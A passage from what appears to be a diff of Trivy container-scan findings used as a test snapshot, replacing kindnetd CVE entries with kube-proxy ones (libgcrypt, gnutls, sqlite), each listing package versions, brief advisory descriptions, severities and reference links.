"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://usn.ubuntu.com/4019-1/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u5", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://dev.gnupg.org/T5328", + }, + { + "type": "URL", + "value": "https://dev.gnupg.org/T5466", + }, + { + "type": "URL", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.3.8+dfsg-3+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-24031", - "installedVersion": "1.3.8+dfsg-3", - "packageName": "libzstd1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-24031", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", - "https://github.com/facebook/zstd/issues/1630", - "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", - "https://ubuntu.com/security/notices/USN-4760-1", - "https://ubuntu.com/security/notices/USN-5720-1", - "https://www.cve.org/CVERecord?id=CVE-2021-24031", - "https://www.facebook.com/security/advisories/cve-2021-24031", - ], - }, - "category": "Vulnerability", - "description": "In the Zstandard command-line utility prior to v1.4.1, output files were created with default permissions. Correct file permissions (matching the input) would only be set at completion time. Output files could therefore be readable or writable to unintended parties.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "zstd: adds read permissions to files while being compressed or uncompressed", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-24031", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-24031", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/1630", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4760-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5720-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-24031", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.facebook.com/security/advisories/cve-2021-24031", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.3.8+dfsg-3+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-24032", - "installedVersion": "1.3.8+dfsg-3", - "packageName": "libzstd1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-6829", + "installedVersion": "1.8.7-6", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-24032", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", - "https://github.com/facebook/zstd/issues/2491", - "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", - "https://ubuntu.com/security/notices/USN-4760-1", - "https://ubuntu.com/security/notices/USN-5720-1", - "https://www.cve.org/CVERecord?id=CVE-2021-24032", - "https://www.facebook.com/security/advisories/cve-2021-24032", + "https://access.redhat.com/security/cve/CVE-2018-6829", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "https://www.oracle.com/security-alerts/cpujan2020.html", ], }, "category": "Vulnerability", - "description": "Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "zstd: Race condition allows attacker to access world-readable destination file", + "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-24032", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-24032", - }, - { - "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", + "value": "https://avd.aquasec.com/nvd/cve-2018-6829", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", + "value": "https://access.redhat.com/security/cve/CVE-2018-6829", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/2491", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", + "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4760-1", + "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5720-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-24032", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", }, { "type": "URL", - "value": "https://www.facebook.com/security/advisories/cve-2021-24032", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "3.7.1-5+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2509", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", + "https://access.redhat.com/errata/RHSA-2022:6854", + "https://access.redhat.com/security/cve/CVE-2022-2509", + "https://bugzilla.redhat.com/2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "https://errata.rockylinux.org/RLSA-2022:6854", + "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "https://linux.oracle.com/cve/CVE-2022-2509.html", + "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "https://www.debian.org/security/2022/dsa-5203", ], }, "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "name": "Double free during gnutls_pkcs7_verify", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://avd.aquasec.com/nvd/cve-2022-2509", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://access.redhat.com/errata/RHSA-2022:6854", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://access.redhat.com/security/cve/CVE-2022-2509", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://bugzilla.redhat.com/2108977", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://errata.rockylinux.org/RLSA-2022:6854", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.debian.org/security/2022/dsa-5203", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "3.7.1-5+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0361", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "https://access.redhat.com/errata/RHSA-2023:1141", + "https://access.redhat.com/security/cve/CVE-2023-0361", + "https://bugzilla.redhat.com/2162596", + "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "https://errata.rockylinux.org/RLSA-2023:1569", + "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "https://linux.oracle.com/cve/CVE-2023-0361.html", + "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "https://security.netapp.com/advisory/ntap-20230324-0005/", + "https://ubuntu.com/security/notices/USN-5901-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0361", ], }, "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": 